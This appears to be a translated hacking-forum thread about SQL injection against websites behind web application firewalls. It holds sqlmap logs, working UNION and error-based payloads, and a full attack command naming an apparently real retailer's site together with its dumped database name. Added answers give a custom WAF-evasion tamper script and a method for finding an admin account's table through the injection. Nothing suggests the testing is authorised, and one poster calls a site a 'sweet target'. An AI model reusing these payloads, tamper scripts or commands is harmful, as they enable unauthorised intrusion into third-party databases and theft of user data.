[08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:06:18] [CRITICAL] connection timed out to the target URL
[08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:08:19] [CRITICAL] connection timed out to the target URL
[08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --string="write")
[08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:10:19] [CRITICAL] connection timed out to the target URL
[08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[08:12:19] [CRITICAL] connection timed out to the target URL
[08:12:19] [WARNING] false positive or unexploitable injection point detected
[08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

How can this be bypassed? The WAF won't let the SQLi go through.
Good day! For example, I know that the DB contains a row with the email admin@admin.com, but I don't know the table and column names, because they have random names like "dfdwydponefdxb". How do I search the whole DB and find which table holds the record with admin@admin.com?
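One way to answer this, as an added example that is not from the thread: first list every text-like column in the current schema from information_schema.columns (that query is what you would run through the injection, e.g. with `sqlmap --sql-query`), then probe each candidate column with a COUNT(*) for the literal value. The runnable part below uses an in-memory SQLite database with constructed random-looking table names so the loop can be seen working offline; sqlite_master and PRAGMA table_info stand in for information_schema there.

```python
"""Locate the table/column holding a known value when names are randomised.

Added example, not from the thread. Step 1 lists text-like (table, column)
pairs from information_schema.columns (MySQL); step 2 probes each one with
COUNT(*). The local demo uses SQLite with constructed names only to show the
loop end to end.
"""
import sqlite3

TEXT_TYPES = ("char", "varchar", "tinytext", "text", "mediumtext", "longtext")


def mysql_candidate_columns_query(schema_expr="DATABASE()"):
    """MySQL query listing text-like columns of one schema.

    schema_expr is inlined unquoted so DATABASE() works; pass a quoted
    literal such as "'shop'" to target a named schema instead.
    """
    types = ",".join("'%s'" % t for t in TEXT_TYPES)
    return ("SELECT table_name,column_name FROM information_schema.columns "
            "WHERE table_schema=%s AND data_type IN (%s)" % (schema_expr, types))


def mysql_probe_query(table, column, value):
    """COUNT(*) probe for one candidate column. Identifiers are backticked
    and single quotes in the value doubled so the literal stays well formed."""
    return "SELECT COUNT(*) FROM `%s` WHERE `%s`='%s'" % (
        table, column, value.replace("'", "''"))


def build_demo_db():
    """Constructed sample schema with random-looking names (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE dfdwydponefdxb (id INTEGER PRIMARY KEY, qlzmxt VARCHAR(255), pwhash TEXT);
        CREATE TABLE kqpzlrvbna (id INTEGER, title TEXT, price REAL);
        INSERT INTO dfdwydponefdxb VALUES (1, 'admin@admin.com', 'hash1');
        INSERT INTO dfdwydponefdxb VALUES (2, 'user@example.com', 'hash2');
        INSERT INTO kqpzlrvbna VALUES (1, 'admin@admin.com', 3.5);
    """)
    return conn


def sqlite_candidate_columns(conn):
    """SQLite stand-in for step 1: every column declared as CHAR/VARCHAR/TEXT."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")]
    for table in tables:
        # PRAGMA table_info rows: (cid, name, declared type, notnull, default, pk)
        for row in conn.execute('PRAGMA table_info("%s")' % table).fetchall():
            if row[2].upper().startswith(("CHAR", "VARCHAR", "TEXT")):
                cols.append((table, row[1]))
    return cols


def find_value(conn, value):
    """Step 2: probe every candidate, return the (table, column) pairs holding it."""
    hits = []
    for table, column in sqlite_candidate_columns(conn):
        q = 'SELECT COUNT(*) FROM "%s" WHERE "%s"=?' % (table, column)
        if conn.execute(q, (value,)).fetchone()[0]:
            hits.append((table, column))
    return hits


if __name__ == "__main__":
    print(mysql_candidate_columns_query())
    db = build_demo_db()
    for t, c in find_value(db, "admin@admin.com"):
        print("hit:", t, c, "->", mysql_probe_query(t, c, "admin@admin.com"))
```

Against a real target the same two steps are run through the injection: feed the information_schema query to `sqlmap --sql-query`, then issue one `mysql_probe_query` per candidate. With a boolean-blind point each probe costs many requests, so it pays to filter the candidate list by column name first (sqlmap's `--search -C` does that part) before brute-forcing every text column.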
Good evening, guys. A question of the moment: maybe there is a ready-made tamper for the Imunify360 (CloudLinux) WAF, or maybe take something ready-made and rewrite it? One sweet target has turned up)) Happy upcoming New Year 2022 to everyone.
Code:
Parameter: JSON #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
    Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SELECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}
    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'BbsS'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DATABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names
Guys, help me get this into sqlmap. There is a bug: site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ works and prints the database name, but sqlmap doesn't see the link as vulnerable. I tried various tampers too; it just shows 403 in the sqlmap log. By hand I manage to get the version out, 10.2.43-MariaDB-cll-lve, and get the user out.
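The hand-made payload hides UNION and SELECT inside versioned comments with an explicit version number. sqlmap's stock versionedkeywords tamper emits /*!UNION*/ with no number, so the following custom tamper, written as an added example that is not part of sqlmap, reproduces the exact shape from the post. The file name versioned12345.py and the keyword list are assumptions; the PRIORITY import is sqlmap's own, with a fallback so the file also imports stand-alone.

```python
#!/usr/bin/env python
"""sqlmap tamper script: wrap keywords in versioned MySQL comments carrying an
explicit version number, so "UNION SELECT" becomes
"/*!12345UNION*/ /*!12345SELECT*/" like the payload in the post.

Added example, not part of sqlmap. Save as tamper/versioned12345.py (name is
an assumption) and chain with space2plus for the '+' separators.
"""
import re

try:
    from lib.core.enums import PRIORITY   # provided by sqlmap at runtime
    __priority__ = PRIORITY.HIGHEST
except ImportError:                       # running outside sqlmap
    __priority__ = 0

# MySQL/MariaDB execute the comment body when the server version is >= VERSION,
# so any small number works; 12345 is what the post used.
VERSION = "12345"
# keywords to hide; extend if the WAF keys on others (e.g. "NULL", "LIMIT")
KEYWORDS = ("UNION", "ALL", "SELECT", "FROM", "WHERE", "GROUP", "ORDER", "BY",
            "HAVING", "LIMIT", "AND", "OR")
# the lookbehind/lookahead skip keywords already inside /*!NNNNNKEYWORD*/ and
# keywords that are only part of a longer identifier (ORDERID, version())
_KW_RE = re.compile(r"(?<![\w/!*])(%s)(?![\w*])" % "|".join(KEYWORDS),
                    re.IGNORECASE)


def dependencies():
    pass


def _wrap(match):
    return "/*!%s%s*/" % (VERSION, match.group(1).upper())


def tamper(payload, **kwargs):
    """Called by sqlmap for every payload; returns the rewritten string.

    >>> tamper("1 UNION ALL SELECT 1,database(),3")
    '1 /*!12345UNION*/ /*!12345ALL*/ /*!12345SELECT*/ 1,database(),3'
    """
    if not payload:
        return payload
    return _KW_RE.sub(_wrap, payload)
```

A run matching the post's working request would be `python sqlmap.py -u "http://site.de/index.php?view_id=-11*" --dbms=mysql --technique=U --union-cols=16 --tamper=versioned12345,space2plus`, so sqlmap only sends the UNION technique it already knows works instead of the boolean/time probes that were drawing the 403s. Like sqlmap's own versionedkeywords, this rewrites keyword-like words inside string literals too; if a payload breaks because of that, narrow KEYWORDS to UNION and SELECT.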
Looks a lot like ModSecurity; you need to either find a tamper or rework a ready-made one. The bypass thread is here: /threads/425295/
What MySQL version? https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
Tried it the way the author does: from {f information_schema.tables} gets blocked, it just returns 403 and that's it, while the plain '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ works and the version is printed. Tried it by hand the way the author does here, too. Also just blocked. Maybe it isn't ModSecurity? Though it certainly looks a lot like it.
[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
[13:53:45] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times

Unfortunately the tamper didn't help.
Spoiler: sqlmap payload
python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries

available databases [1]:
[*] mkeducat_books2019
What is wrong in this request?

python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","module":"install-broadcast","op":"setup","packageAppName":"ar.ity","position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch

[05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108

P.S. I also checked "type" and 'type' both in -p and in the request data.
P.P.S. sqlmap -r request.txt doesn't work in this case either (and this payload is workable, because another scanner can execute an SQL query with it).